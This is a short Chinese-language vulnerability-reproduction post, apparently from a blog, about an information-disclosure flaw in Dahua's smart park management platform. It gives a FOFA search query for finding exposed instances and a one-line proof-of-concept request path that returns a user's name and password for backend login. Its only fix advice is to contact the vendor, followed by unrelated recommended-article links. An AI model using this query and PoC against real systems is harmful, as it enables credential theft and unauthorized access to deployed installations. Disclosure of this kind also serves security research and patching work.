【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
weixin_473894771 分钟前
前端服务器部署分类总结
前端·网络·性能优化
HelloZheQ6 分钟前
MVCC:数据库并发控制的利器
服务器·数据库·oracle
OpenVINO生态社区23 分钟前
【美国将取消对能源之星支持 严重影响AI服务器】
服务器·人工智能·能源
珹洺32 分钟前
计算机操作系统(七)详细讲解进程的组成与特性,状态与转换
运维·服务器·计算机网络
JXY_AI44 分钟前
大模型越狱:技术漏洞与安全挑战——从原理到防御
安全
上海云盾-高防顾问44 分钟前
SCDN如何有效防护网站免受CC攻击?——安全加速网络的实战解析
网络·安全
riusksk1 小时前
网络安全顶会——SP 2025 论文清单与摘要
安全·web安全
alden_ygq1 小时前
nginx 出现大量connect reset by peer
服务器·网络·nginx
wangchen_01 小时前
linux-进程信号的产生
linux·运维·服务器
xiao--xin1 小时前
计算机网络笔记(二十三)——4.5IPv6
网络·笔记·计算机网络·ipv6